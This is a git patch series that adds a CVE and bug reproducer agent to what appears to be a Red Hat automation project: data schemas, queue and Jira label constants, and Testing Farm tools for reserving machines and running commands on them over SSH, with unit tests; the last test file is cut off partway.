From 97b4db3456959bb92cca87659fa4dea9faaa76b1 Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 08:51:59 +0200 Subject: [PATCH 01/16] Add reproducer input/output models and unit tests Add ReproducerInputSchema and ReproducerOutputSchema for structured agent input/output with validation. Includes comprehensive unit tests. Co-Authored-By: Claude Opus 4.6 --- ymir/common/models.py | 37 +++++++++ ymir/common/tests/unit/test_models.py | 106 ++++++++++++++++++++++++++ 2 files changed, 143 insertions(+) diff --git a/ymir/common/models.py b/ymir/common/models.py index c0bb1f7a..71b06da4 100644 --- a/ymir/common/models.py +++ b/ymir/common/models.py @@ -956,3 +956,40 @@ class WorkflowResult(BaseModel): reschedule_in: float = Field( description="Delay in seconds to reschedule the work item. Negative value means don't reschedule" ) + + +# ============================================================================ +# Reproducer Agent Schemas +# ============================================================================ + + +class ReproducerInputSchema(BaseModel): + """Input schema for the reproducer agent.""" + + jira_issue: str = Field(description="Jira issue identifier") + package: str | None = Field(default=None, description="Package name") + cve_id: str | None = Field(default=None, description="CVE identifier") + patch_urls: list[str] | None = Field(default=None, description="List of URLs to upstream patches") + triage_summary: str | None = Field( + default=None, + description="Triage context: what was investigated and guidance on how the reproducer should be done", + ) + fix_version: str | None = Field(default=None, description="Fix version in Jira (e.g., 'rhel-9.8')") + target_branch: str | None = Field(default=None, description="Target dist-git branch") + + +class ReproducerOutputSchema(BaseModel): + """Output schema for the reproducer agent.""" + + jira_issue: str = Field(description="Jira issue identifier") + success: bool = Field(description="Whether the reproducer was successfully completed") + reproducer_type: Literal["cve", "bug"] = Field(description="Type of reproducer: 'cve' or 'bug'") + test_mr_url: str | None = Field(default=None, description="URL of the test merge request") + testing_farm_request_id: str | None = Field( + default=None, description="Testing Farm request ID for the submitted test run" + ) + pass_fail_criteria: str = Field(description="Criteria used to determine pass or fail") + summary: str = Field(description="Summary of the reproducer result") + not_reproducible_reason: str | None = Field( + default=None, description="Reason the issue could not be reproduced, if applicable" + ) diff --git a/ymir/common/tests/unit/test_models.py b/ymir/common/tests/unit/test_models.py index 4efd6119..87d3830c 100644 --- a/ymir/common/tests/unit/test_models.py +++ b/ymir/common/tests/unit/test_models.py @@ -11,6 +11,8 @@ PostponedData, RebaseData, RebuildData, + ReproducerInputSchema, + ReproducerOutputSchema, Resolution, TriageOutputSchema, ) @@ -446,3 +448,107 @@ def test_backport_formatting_without_triage_summary(): comment = result.format_for_comment() assert "*Triage Reasoning*" not in comment assert "*Justification*: Fixes the bug in bind.c" in comment + + +# --- ReproducerInputSchema / ReproducerOutputSchema tests --- + + +def test_reproducer_input_minimal(): + """Create with only required field (jira_issue), verify optional fields default to None.""" + data = ReproducerInputSchema(jira_issue="RHEL-99999") + assert data.jira_issue == "RHEL-99999" + assert data.package is None + assert data.cve_id is None + assert data.patch_urls is None + assert data.triage_summary is None + assert data.fix_version is None + assert data.target_branch is None + + +def test_reproducer_input_full(): + """Create with all fields populated, verify values.""" + data = ReproducerInputSchema( + jira_issue="RHEL-11111", + package="openssl", + cve_id="CVE-2025-9999", + patch_urls=[ + "https://github.com/openssl/openssl/commit/abc123.patch", + "https://github.com/openssl/openssl/commit/def456.patch", + ], + triage_summary="Buffer overflow in TLS handshake parsing.", + fix_version="rhel-9.8", + target_branch="rhel-9.8.0", + ) + assert data.jira_issue == "RHEL-11111" + assert data.package == "openssl" + assert data.cve_id == "CVE-2025-9999" + assert data.patch_urls == [ + "https://github.com/openssl/openssl/commit/abc123.patch", + "https://github.com/openssl/openssl/commit/def456.patch", + ] + assert data.triage_summary == "Buffer overflow in TLS handshake parsing." + assert data.fix_version == "rhel-9.8" + assert data.target_branch == "rhel-9.8.0" + + +def test_reproducer_output_success(): + """Create a successful reproducer output with test_mr_url set.""" + data = ReproducerOutputSchema( + jira_issue="RHEL-11111", + success=True, + reproducer_type="cve", + test_mr_url="https://gitlab.com/tests/openssl/-/merge_requests/42", + testing_farm_request_id="tf-req-abc123", + pass_fail_criteria=( + "Test triggers the buffer overflow on unpatched build and passes on patched build." + ), + summary="Reproducer created and submitted to Testing Farm.", + ) + assert data.success is True + assert data.reproducer_type == "cve" + assert data.test_mr_url == "https://gitlab.com/tests/openssl/-/merge_requests/42" + assert data.testing_farm_request_id == "tf-req-abc123" + assert data.not_reproducible_reason is None + + +def test_reproducer_output_not_reproducible(): + """Create with success=False and not_reproducible_reason set.""" + data = ReproducerOutputSchema( + jira_issue="RHEL-22222", + success=False, + reproducer_type="bug", + pass_fail_criteria="Expected segfault when processing crafted input.", + summary="Could not reproduce the reported crash.", + not_reproducible_reason="The vulnerable code path is not reachable with the shipped configuration.", + ) + assert data.success is False + assert data.reproducer_type == "bug" + assert data.test_mr_url is None + assert data.testing_farm_request_id is None + assert data.not_reproducible_reason == ( + "The vulnerable code path is not reachable with the shipped configuration." + ) + + +def test_reproducer_output_roundtrip(): + """Serialize to JSON and back, verify all fields survive.""" + original = ReproducerOutputSchema( + jira_issue="RHEL-33333", + success=True, + reproducer_type="cve", + test_mr_url="https://gitlab.com/tests/curl/-/merge_requests/7", + testing_farm_request_id="tf-req-xyz789", + pass_fail_criteria="Exploit PoC returns exit code 1 on vulnerable build, 0 on fixed.", + summary="CVE reproducer submitted successfully.", + not_reproducible_reason=None, + ) + json_str = original.model_dump_json() + restored = ReproducerOutputSchema.model_validate_json(json_str) + assert restored.jira_issue == original.jira_issue + assert restored.success == original.success + assert restored.reproducer_type == original.reproducer_type + assert restored.test_mr_url == original.test_mr_url + assert restored.testing_farm_request_id == original.testing_farm_request_id + assert restored.pass_fail_criteria == original.pass_fail_criteria + assert restored.summary == original.summary + assert restored.not_reproducible_reason is None From df4f489fc55f06ed11ff74a224d00912d20d4501 Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 08:52:04 +0200 Subject: [PATCH 02/16] Add reproducer queue constants and Jira labels Add REPRODUCER_QUEUE name and lifecycle labels (REPRODUCER_TRIAGED, REPRODUCER_COMPLETED, REPRODUCER_FAILED, REPRODUCER_ERRORED) for tracking reproducer agent pipeline state in Jira. Co-Authored-By: Claude Opus 4.6 --- ymir/common/constants.py | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/ymir/common/constants.py b/ymir/common/constants.py index 56995770..c6d38efd 100644 --- a/ymir/common/constants.py +++ b/ymir/common/constants.py @@ -47,6 +47,9 @@ class RedisQueues(Enum): REBASE_QUEUE = "rebase_queue" BACKPORT_QUEUE = "backport_queue" POSTPONED_LIST = "postponed_list" + REPRODUCER_QUEUE = "reproducer_queue" + REPRODUCER_QUEUE_TODO = "reproducer_queue_todo" + COMPLETED_REPRODUCER_LIST = "completed_reproducer_list" @classmethod def all_queues(cls) -> set[str]: @@ -74,6 +77,8 @@ def input_queues(cls) -> set[str]: cls.CLARIFICATION_NEEDED_QUEUE.value, cls.REBASE_QUEUE.value, cls.BACKPORT_QUEUE.value, + cls.REPRODUCER_QUEUE.value, + cls.REPRODUCER_QUEUE_TODO.value, } @classmethod @@ -85,6 +90,7 @@ def data_queues(cls) -> set[str]: cls.COMPLETED_REBASE_LIST.value, cls.COMPLETED_BACKPORT_LIST.value, cls.COMPLETED_REBUILD_LIST.value, + cls.COMPLETED_REPRODUCER_LIST.value, cls.POSTPONED_LIST.value, } @@ -155,6 +161,11 @@ class JiraLabels(Enum): REBASE_FAILED = "ymir_rebase_failed" BACKPORT_FAILED = "ymir_backport_failed" REBUILD_FAILED = "ymir_rebuild_failed" + REPRODUCER_IN_PROGRESS = "ymir_reproducer_in_progress" + REPRODUCER_CREATED = "ymir_reproducer_created" + REPRODUCER_FAILED = "ymir_reproducer_failed" + REPRODUCER_ERRORED = "ymir_reproducer_errored" + REPRODUCER_NOT_REPRODUCIBLE = "ymir_reproducer_not_reproducible" TRIAGED_POSTPONED = "ymir_triaged_postponed" TRIAGED_NOT_AFFECTED = "ymir_triaged_not_affected" From 54d7ae80e70d3e0ccda8792ceb9dd83a9d0c6984 Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 09:19:33 +0200 Subject: [PATCH 03/16] Make Testing Farm API URL configurable and harden API helpers Make TF API URL configurable via TESTING_FARM_API_URL env var (defaults to testing-farm.io). Add _redact_secrets for safe logging of API payloads, _testing_farm_api_delete helper, _ensure_gateway_ssh_key for gateway-managed SSH key generation, and _parse_tf_request helper. Co-Authored-By: Claude Opus 4.6 --- ymir/tools/privileged/testing_farm.py | 67 +++++++++++++++++++++++---- 1 file changed, 58 insertions(+), 9 deletions(-) diff --git a/ymir/tools/privileged/testing_farm.py b/ymir/tools/privileged/testing_farm.py index c1aa7c9f..eafeb35e 100644 --- a/ymir/tools/privileged/testing_farm.py +++ b/ymir/tools/privileged/testing_farm.py @@ -1,15 +1,21 @@ +import asyncio +import base64 import logging import os +import re +import subprocess +import threading from datetime import datetime from functools import cache from json import dumps as json_dumps +from pathlib import Path from typing import Any import requests from beeai_framework.context import RunContext from beeai_framework.emitter import Emitter from beeai_framework.tools import JSONToolOutput, Tool, ToolError, ToolRunOptions -from pydantic import BaseModel, Field +from pydantic import BaseModel, Field, field_validator from ymir.common.models import ( TestingFarmRequest, @@ -18,7 +24,21 @@ logger = logging.getLogger(__name__) -TESTING_FARM_URL = "https://api.testing-farm.io/v0.1" +_REDACTED_KEYS = frozenset({"secrets", "api_key", "token", "password"}) + + +def _redact_secrets(obj: Any) -> Any: + """Recursively redact sensitive keys from a nested dict/list structure.""" + if isinstance(obj, dict): + return {k: ("***" if k in _REDACTED_KEYS else _redact_secrets(v)) for k, v in obj.items()} + if isinstance(obj, list): + return [_redact_secrets(item) for item in obj] + return obj + + +@cache +def _testing_farm_url() -> str: + return os.environ.get("TESTING_FARM_API_URL", "https://api.testing-farm.io/v0.1") @cache @@ -30,8 +50,28 @@ def _testing_farm_headers() -> dict[str, str]: } +_SSH_KEY_PATH = Path.home() / ".ssh" / "id_ed25519" +_ssh_key_lock = threading.Lock() + + +def _ensure_gateway_ssh_key() -> str: + """Ensure the gateway has an SSH key pair and return the public key content.""" + pub_path = _SSH_KEY_PATH.with_suffix(".pub") + with _ssh_key_lock: + if not _SSH_KEY_PATH.exists() or not pub_path.exists(): + _SSH_KEY_PATH.parent.mkdir(parents=True, exist_ok=True, mode=0o700) + _SSH_KEY_PATH.unlink(missing_ok=True) + pub_path.unlink(missing_ok=True) + subprocess.run( + ["ssh-keygen", "-t", "ed25519", "-f", str(_SSH_KEY_PATH), "-N", "", "-q"], + check=True, + ) + logger.info("Generated gateway SSH key pair at %s", _SSH_KEY_PATH) + return pub_path.read_text().strip() + + def _testing_farm_api_get(path: str, *, params: dict | None = None) -> Any: - url = f"{TESTING_FARM_URL}/{path}" + url = f"{_testing_farm_url()}/{path}" response = requests.get(url, headers=_testing_farm_headers(), params=params, timeout=30) if not response.ok: logger.error( @@ -42,16 +82,25 @@ def _testing_farm_api_get(path: str, *, params: dict | None = None) -> Any: def _testing_farm_api_post(path: str, json: dict[str, Any]) -> Any: - url = f"{TESTING_FARM_URL}/{path}" + url = f"{_testing_farm_url()}/{path}" response = requests.post(url, headers=_testing_farm_headers(), json=json, timeout=30) if not response.ok: logger.error( - "POST to %s failed\nbody:\n%s\nerror:\n%s", url, json_dumps(json, indent=2), response.text + "POST to %s failed\nbody:\n%s\nerror:\n%s", + url, json_dumps(_redact_secrets(json), indent=2), response.text ) response.raise_for_status() return response.json() +def _testing_farm_api_delete(path: str) -> None: + url = f"{_testing_farm_url()}/{path}" + response = requests.delete(url, headers=_testing_farm_headers(), timeout=30) + if not response.ok: + logger.error("DELETE %s failed.\nerror:\n%s", url, response.text) + response.raise_for_status() + + def _parse_tf_request(response: dict[str, Any]) -> TestingFarmRequest: result_data = response.get("result") result = result_data["overall"] if result_data else TestingFarmRequestResult.UNKNOWN @@ -59,7 +108,7 @@ def _parse_tf_request(response: dict[str, Any]) -> TestingFarmRequest: return TestingFarmRequest( id=response["id"], - url=f"{TESTING_FARM_URL}/requests/{response['id']}", + url=f"{_testing_farm_url()}/requests/{response['id']}", state=response["state"], result=result, error_reason=error_reason, @@ -101,7 +150,7 @@ async def _run( ) -> JSONToolOutput[dict[str, Any]]: logger.info("Getting Testing Farm request %s", tool_input.request_id) try: - response = _testing_farm_api_get(f"requests/{tool_input.request_id}") + response = await asyncio.to_thread(_testing_farm_api_get, f"requests/{tool_input.request_id}") tf_request = _parse_tf_request(response) except Exception as e: raise ToolError(f"Failed to get Testing Farm request {tool_input.request_id}: {e}") from e @@ -149,7 +198,7 @@ async def _run( try: # Fetch the original request - original_response = _testing_farm_api_get(f"requests/{request_id}") + original_response = await asyncio.to_thread(_testing_farm_api_get, f"requests/{request_id}") original = _parse_tf_request(original_response) # Build new environments with the replacement build @@ -186,7 +235,7 @@ def create_new_environment(env: dict) -> dict: "environments": [create_new_environment(env) for env in original.environments_data], } - response = _testing_farm_api_post("requests", json=body) + response = await asyncio.to_thread(_testing_farm_api_post, "requests", json=body) new_request = _parse_tf_request(response) except Exception as e: From bb703a01c0de7e4ae6ac2e5175d3ce0d3455b6ae Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 09:19:46 +0200 Subject: [PATCH 04/16] Add Testing Farm reservation lifecycle tools Add three MCP tools for the TF machine reservation lifecycle: - ReserveTestingFarmMachineTool: provisions machines with SSH access, security group ingress rules, and configurable compose/arch/duration - GetTestingFarmReservationDetailsTool: polls SSH availability from pipeline.log with built-in retry (20 attempts, 30s intervals) and transient HTTP 502/503/504 retry - CancelTestingFarmRequestTool: releases reserved machines via API Includes input validation with regex patterns for request_id and remote_dir parameters. Co-Authored-By: Claude Opus 4.6 --- ymir/tools/privileged/testing_farm.py | 272 +++++++++++++++++++++++++- 1 file changed, 270 insertions(+), 2 deletions(-) diff --git a/ymir/tools/privileged/testing_farm.py b/ymir/tools/privileged/testing_farm.py index eafeb35e..9475351e 100644 --- a/ymir/tools/privileged/testing_farm.py +++ b/ymir/tools/privileged/testing_farm.py @@ -62,8 +62,8 @@ def _ensure_gateway_ssh_key() -> str: _SSH_KEY_PATH.parent.mkdir(parents=True, exist_ok=True, mode=0o700) _SSH_KEY_PATH.unlink(missing_ok=True) pub_path.unlink(missing_ok=True) - subprocess.run( - ["ssh-keygen", "-t", "ed25519", "-f", str(_SSH_KEY_PATH), "-N", "", "-q"], + subprocess.run( # noqa: S603 + ["ssh-keygen", "-t", "ed25519", "-f", str(_SSH_KEY_PATH), "-N", "", "-q"], # noqa: S607 check=True, ) logger.info("Generated gateway SSH key pair at %s", _SSH_KEY_PATH) @@ -242,3 +242,271 @@ def create_new_environment(env: dict) -> dict: raise ToolError(f"Failed to reproduce Testing Farm request {request_id}: {e}") from e return JSONToolOutput(result=new_request.model_dump(mode="json")) + + +class ReserveTestingFarmMachineToolInput(BaseModel): + compose: str = Field(description="Compose to reserve, e.g. RHEL-9.8.0-Nightly") + arch: str = Field(default="x86_64", description="Architecture of the machine") + duration_minutes: int = Field(default=60, description="Reservation duration in minutes") + ssh_public_key: str | None = Field( + default=None, + description="SSH public key content. If omitted, the gateway's own key is used (recommended).", + ) + + +class ReserveTestingFarmMachineTool( + Tool[ReserveTestingFarmMachineToolInput, ToolRunOptions, JSONToolOutput[dict[str, Any]]] +): + name = "reserve_testing_farm_machine" + description = """ + Reserve a Testing Farm machine for SSH access. + """ + input_schema = ReserveTestingFarmMachineToolInput + + def _create_emitter(self) -> Emitter: + return Emitter.root().child( + namespace=["tool", "testing_farm", self.name], + creator=self, + ) + + async def _run( + self, + tool_input: ReserveTestingFarmMachineToolInput, + options: ToolRunOptions | None, + context: RunContext, + ) -> JSONToolOutput[dict[str, Any]]: + logger.info( + "Reserving Testing Farm machine: compose=%s arch=%s duration=%dm", + tool_input.compose, + tool_input.arch, + tool_input.duration_minutes, + ) + + if os.getenv("DRY_RUN", "False").lower() == "true": + return JSONToolOutput( + result={ + "id": "dry-run-reservation", + "message": ( + f"Dry run: would reserve {tool_input.compose} {tool_input.arch} " + f"for {tool_input.duration_minutes}m" + ), + } + ) + + try: + # Always use the gateway's own SSH key so run_remote_command can authenticate + ssh_public_key = await asyncio.to_thread(_ensure_gateway_ssh_key) + if tool_input.ssh_public_key and tool_input.ssh_public_key != ssh_public_key: + logger.info( + "Ignoring agent-provided SSH key; using gateway's own key for TF reservation " + "(run_remote_command runs in the gateway container)" + ) + ssh_key_b64 = base64.b64encode(ssh_public_key.encode()).decode() + + body = { + "test": { + "fmf": { + "url": "https://gitlab.com/testing-farm/tests", + "ref": "main", + "name": "/testing-farm/reserve", + } + }, + "environments": [ + { + "arch": tool_input.arch, + "os": {"compose": tool_input.compose}, + "variables": { + "TF_RESERVATION_DURATION": str(tool_input.duration_minutes), + }, + "secrets": { + "TF_RESERVATION_AUTHORIZED_KEYS_BASE64": ssh_key_b64, + }, + "settings": { + "provisioning": { + "security_group_rules_ingress": [ + { + "type": "ingress", + "protocol": "tcp", + "cidr": "0.0.0.0/0", + "port_min": 22, + "port_max": 22, + } + ], + "security_group_rules_egress": [], + } + }, + } + ], + "settings": { + "pipeline": { + "timeout": max(tool_input.duration_minutes, 720), + } + }, + } + + response = await asyncio.to_thread(_testing_farm_api_post, "requests", json=body) + except Exception as e: + raise ToolError( + f"Failed to reserve Testing Farm machine: {e}" + ) from e + + return JSONToolOutput(result={"id": response["id"]}) + + +class GetTestingFarmReservationDetailsToolInput(BaseModel): + request_id: str = Field(description="Testing Farm reservation request ID", pattern=r"^[a-zA-Z0-9_-]+$") + + +class GetTestingFarmReservationDetailsTool( + Tool[GetTestingFarmReservationDetailsToolInput, ToolRunOptions, JSONToolOutput[dict[str, Any]]] +): + name = "get_testing_farm_reservation_details" + description = """ + Get the status and SSH details of a Testing Farm reservation. + Polls internally for up to 10 minutes until SSH is available or a terminal state is reached. + Do NOT wrap this tool in a retry loop — it handles waiting internally. + """ + input_schema = GetTestingFarmReservationDetailsToolInput + + def _create_emitter(self) -> Emitter: + return Emitter.root().child( + namespace=["tool", "testing_farm", self.name], + creator=self, + ) + + async def _run( + self, + tool_input: GetTestingFarmReservationDetailsToolInput, + options: ToolRunOptions | None, + context: RunContext, + ) -> JSONToolOutput[dict[str, Any]]: + logger.info("Getting Testing Farm reservation details for %s", tool_input.request_id) + + if os.getenv("DRY_RUN", "False").lower() == "true": + return JSONToolOutput( + result={"state": "complete", "ssh_connection": "root@dry-run-host"} + ) + + max_attempts = 20 + poll_interval = 30 + state = "unknown" + + _TRANSIENT_HTTP_CODES = (502, 503, 504) + + for attempt in range(1, max_attempts + 1): + try: + response = await asyncio.to_thread(_testing_farm_api_get, f"requests/{tool_input.request_id}") + except requests.RequestException as e: + is_transient = False + if isinstance(e, requests.HTTPError) and e.response is not None: + if e.response.status_code in _TRANSIENT_HTTP_CODES: + is_transient = True + elif isinstance(e, (requests.ConnectionError, requests.Timeout)): + is_transient = True + + if is_transient: + logger.warning( + "Transient error %s polling TF %s (attempt %d/%d)", + e, tool_input.request_id, attempt, max_attempts, + ) + if attempt < max_attempts: + await asyncio.sleep(poll_interval) + continue + raise ToolError( + f"Failed to get Testing Farm reservation details {tool_input.request_id}: {e}" + ) from e + except Exception as e: + raise ToolError( + f"Failed to get Testing Farm reservation details {tool_input.request_id}: {e}" + ) from e + + state = response.get("state", "unknown") + + if state in ("complete", "canceled", "cancel-requested", "error"): + return JSONToolOutput(result={"state": state, "ssh_connection": "not-yet-available"}) + + if state == "running": + artifacts_url = (response.get("run") or {}).get("artifacts") + if artifacts_url: + try: + log_url = f"{artifacts_url}/pipeline.log" + log_resp = await asyncio.to_thread(requests.get, log_url, timeout=30) + if log_resp.ok: + log_text = log_resp.text + guest_match = re.search( + r"Guest is ready.*root@([\d\w.\-]+)", log_text + ) + if not guest_match: + guest_match = re.search( + r"\[.*?\]\s+primary address:\s+([\d\w.\-]+)", log_text + ) + ready = "execute task #1" in log_text + if guest_match and ready: + ssh_connection = f"root@{guest_match.group(1)}" + logger.info( + "SSH available for %s: %s (attempt %d)", + tool_input.request_id, ssh_connection, attempt, + ) + return JSONToolOutput( + result={"state": state, "ssh_connection": ssh_connection} + ) + except Exception: + logger.debug("Could not fetch pipeline.log for %s", tool_input.request_id) + + if attempt < max_attempts: + logger.info( + "SSH not yet available for %s, polling again in %ds (attempt %d/%d)", + tool_input.request_id, poll_interval, attempt, max_attempts, + ) + await asyncio.sleep(poll_interval) + + return JSONToolOutput(result={"state": state, "ssh_connection": "not-yet-available"}) + + +class CancelTestingFarmRequestToolInput(BaseModel): + request_id: str = Field(description="Testing Farm request ID to cancel", pattern=r"^[a-zA-Z0-9_-]+$") + + +class CancelTestingFarmRequestTool( + Tool[CancelTestingFarmRequestToolInput, ToolRunOptions, JSONToolOutput[dict[str, Any]]] +): + name = "cancel_testing_farm_request" + description = """ + Cancel a Testing Farm request and release the reserved machine. + """ + input_schema = CancelTestingFarmRequestToolInput + + def _create_emitter(self) -> Emitter: + return Emitter.root().child( + namespace=["tool", "testing_farm", self.name], + creator=self, + ) + + async def _run( + self, + tool_input: CancelTestingFarmRequestToolInput, + options: ToolRunOptions | None, + context: RunContext, + ) -> JSONToolOutput[dict[str, Any]]: + request_id = tool_input.request_id + logger.info("Cancelling Testing Farm request %s", request_id) + + if os.getenv("DRY_RUN", "False").lower() == "true": + return JSONToolOutput( + result={ + "cancelled": True, + "request_id": request_id, + "message": f"Dry run: would cancel request {request_id}", + } + ) + + try: + await asyncio.to_thread(_testing_farm_api_delete, f"requests/{request_id}") + except Exception as e: + raise ToolError( + f"Failed to cancel Testing Farm request {request_id}: {e}" + ) from e + + return JSONToolOutput(result={"cancelled": True, "request_id": request_id}) + + From 4d4206dbfcd6232dc9dc4a35ec1e757214af4c16 Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 09:19:56 +0200 Subject: [PATCH 05/16] Add RunRemoteCommand and CopyFilesToRemote tools for SSH operations Add two MCP tools for executing commands on reserved TF machines: - RunRemoteCommandTool: runs commands via SSH with configurable timeout, working directory, and gateway SSH key - CopyFilesToRemoteTool: transfers files via SCP with path validation against an allowlist of safe base directories Co-Authored-By: Claude Opus 4.6 --- ymir/tools/privileged/testing_farm.py | 183 ++++++++++++++++++++++++++ 1 file changed, 183 insertions(+) diff --git a/ymir/tools/privileged/testing_farm.py b/ymir/tools/privileged/testing_farm.py index 9475351e..4ef0a0f6 100644 --- a/ymir/tools/privileged/testing_farm.py +++ b/ymir/tools/privileged/testing_farm.py @@ -510,3 +510,186 @@ async def _run( return JSONToolOutput(result={"cancelled": True, "request_id": request_id}) +class RunRemoteCommandToolInput(BaseModel): + ssh_host: str = Field(description="SSH target in user@ip format", pattern=r"^[a-zA-Z0-9_]+@[\w.\-]+$") + command: str = Field(description="Command to run on the remote machine") + timeout: int = Field(default=300, description="Timeout in seconds for the command to finish") + + +class RunRemoteCommandTool( + Tool[RunRemoteCommandToolInput, ToolRunOptions, JSONToolOutput[dict[str, Any]]] +): + name = "run_remote_command" + description = """ + Run a command on a remote machine via SSH. + """ + input_schema = RunRemoteCommandToolInput + + def _create_emitter(self) -> Emitter: + return Emitter.root().child( + namespace=["tool", "testing_farm", self.name], + creator=self, + ) + + async def _run( + self, + tool_input: RunRemoteCommandToolInput, + options: ToolRunOptions | None, + context: RunContext, + ) -> JSONToolOutput[dict[str, Any]]: + ssh_host = tool_input.ssh_host + command = tool_input.command + timeout = tool_input.timeout + logger.info("Running remote command on %s: %s", ssh_host, command) + + if os.getenv("DRY_RUN", "False").lower() == "true": + return JSONToolOutput( + result={ + "stdout": "", + "stderr": "", + "exit_code": 0, + "message": f"Dry run: would run '{command}' on {ssh_host}", + } + ) + + try: + _ensure_gateway_ssh_key() + proc = await asyncio.create_subprocess_exec( + "ssh", + "-i", str(_SSH_KEY_PATH), + "-o", "StrictHostKeyChecking=no", + "-o", "UserKnownHostsFile=/dev/null", + ssh_host, + command, + stdout=asyncio.subprocess.PIPE, + stderr=asyncio.subprocess.PIPE, + ) + stdout, stderr = await asyncio.wait_for(proc.communicate(), timeout=timeout) + except TimeoutError as e: + proc.kill() + await proc.wait() + raise ToolError( + f"Command timed out after {timeout}s on {ssh_host}: {command}" + ) from e + except Exception as e: + raise ToolError( + f"Failed to run command on {ssh_host}: {e}" + ) from e + + return JSONToolOutput( + result={ + "stdout": stdout.decode() if stdout else "", + "stderr": stderr.decode() if stderr else "", + "exit_code": proc.returncode, + } + ) + + +_ALLOWED_COPY_BASES = (Path("/git-repos"), Path("/tmp")) # noqa: S108 + + +class CopyFilesToRemoteToolInput(BaseModel): + ssh_host: str = Field(description="SSH host in user@ip format", pattern=r"^[a-zA-Z0-9_]+@[\w.\-]+$") + local_paths: list[str] = Field(description="Local file paths to copy") + remote_dir: str = Field( + default="/tmp/reproducer", # noqa: S108 + description="Remote directory to copy files to", + pattern=r"^[a-zA-Z0-9/_.\-]+$", + ) + timeout: int = Field(default=120, description="Timeout in seconds for the copy operation") + + @field_validator("local_paths") + @classmethod + def validate_local_paths(cls, v: list[str]) -> list[str]: + for p in v: + resolved = Path(p).resolve() + if not any(resolved.is_relative_to(base) for base in _ALLOWED_COPY_BASES): + raise ValueError( + f"Path {p} is not under an allowed directory" + f" ({', '.join(str(b) for b in _ALLOWED_COPY_BASES)})" + ) + return v + + +class CopyFilesToRemoteTool( + Tool[CopyFilesToRemoteToolInput, ToolRunOptions, JSONToolOutput[dict[str, Any]]] +): + name = "copy_files_to_remote" + description = """ + Copy files to a remote machine via SCP. + """ + input_schema = CopyFilesToRemoteToolInput + + def _create_emitter(self) -> Emitter: + return Emitter.root().child( + namespace=["tool", "testing_farm", self.name], + creator=self, + ) + + async def _run( + self, + tool_input: CopyFilesToRemoteToolInput, + options: ToolRunOptions | None, + context: RunContext, + ) -> JSONToolOutput[dict[str, Any]]: + ssh_host = tool_input.ssh_host + local_paths = tool_input.local_paths + remote_dir = tool_input.remote_dir + timeout = tool_input.timeout + logger.info("Copying %s to %s:%s", local_paths, ssh_host, remote_dir) + + if os.getenv("DRY_RUN", "False").lower() == "true": + return JSONToolOutput( + result={ + "copied": True, + "remote_dir": remote_dir, + "files": local_paths, + "message": f"Dry run: would copy {local_paths} to {ssh_host}:{remote_dir}", + } + ) + + _ensure_gateway_ssh_key() + ssh_opts = [ + "-i", str(_SSH_KEY_PATH), + "-o", "StrictHostKeyChecking=no", + "-o", "UserKnownHostsFile=/dev/null", + ] + + active_proc = None + try: + # Create the remote directory + active_proc = await asyncio.create_subprocess_exec( + "ssh", *ssh_opts, ssh_host, "mkdir", "-p", remote_dir, + stdout=asyncio.subprocess.PIPE, + stderr=asyncio.subprocess.PIPE, + ) + _, stderr = await asyncio.wait_for(active_proc.communicate(), timeout=timeout) + if active_proc.returncode != 0: + raise RuntimeError( + f"Failed to create remote directory {remote_dir}: {stderr.decode().strip()}" + ) + + # Copy files via scp + active_proc = await asyncio.create_subprocess_exec( + "scp", *ssh_opts, "-r", *local_paths, f"{ssh_host}:{remote_dir}", + stdout=asyncio.subprocess.PIPE, + stderr=asyncio.subprocess.PIPE, + ) + _, stderr = await asyncio.wait_for(active_proc.communicate(), timeout=timeout) + if active_proc.returncode != 0: + raise RuntimeError( + f"SCP failed: {stderr.decode().strip()}" + ) + except TimeoutError as e: + if active_proc: + active_proc.kill() + await active_proc.wait() + raise ToolError( + f"Copy operation timed out after {timeout}s to {ssh_host}:{remote_dir}" + ) from e + except Exception as e: + raise ToolError( + f"Failed to copy files to {ssh_host}:{remote_dir}: {e}" + ) from e + + return JSONToolOutput(result={"copied": True, "remote_dir": remote_dir, "files": local_paths}) From 4a1cfb1ae83d370a94323d817b8cdf9457f2a9f7 Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 09:24:48 +0200 Subject: [PATCH 06/16] Add Testing Farm tools unit tests Comprehensive test suite covering all TF tools: reservation, polling with retry/transient-error handling, cancellation, remote command execution, file copying, input validation patterns, SSH key management, and dry-run mode. Co-Authored-By: Claude Opus 4.6 --- .../tests/unit/test_testing_farm.py | 713 ++++++++++++++++++ 1 file changed, 713 insertions(+) create mode 100644 ymir/tools/privileged/tests/unit/test_testing_farm.py diff --git a/ymir/tools/privileged/tests/unit/test_testing_farm.py b/ymir/tools/privileged/tests/unit/test_testing_farm.py new file mode 100644 index 00000000..801921e9 --- /dev/null +++ b/ymir/tools/privileged/tests/unit/test_testing_farm.py @@ -0,0 +1,713 @@ +"""Unit tests for ReserveTestingFarmMachineTool and GetTestingFarmReservationDetailsTool.""" + +import asyncio +import base64 +from unittest.mock import AsyncMock, MagicMock, patch + +import pytest +import requests +from beeai_framework.tools import ToolError +from flexmock import flexmock +from pydantic import ValidationError + +from ymir.tools.privileged import testing_farm as tf_module +from ymir.tools.privileged.testing_farm import ( + _SSH_KEY_PATH, + CancelTestingFarmRequestTool, + CancelTestingFarmRequestToolInput, + CopyFilesToRemoteTool, + CopyFilesToRemoteToolInput, + GetTestingFarmReservationDetailsTool, + GetTestingFarmReservationDetailsToolInput, + ReserveTestingFarmMachineTool, + RunRemoteCommandTool, +) + +SAMPLE_SSH_KEY = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAITestKey user@host" +GATEWAY_SSH_KEY = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGatewayKey gateway@mcp" + + +@pytest.fixture(autouse=True) +def _mock_gateway_ssh_key(): + """Mock _ensure_gateway_ssh_key so tests don't generate real keys.""" + with patch.object(tf_module, "_ensure_gateway_ssh_key", return_value=GATEWAY_SSH_KEY): + yield + + +@pytest.mark.asyncio +async def test_reserve_machine_dry_run(monkeypatch): + """DRY_RUN=true 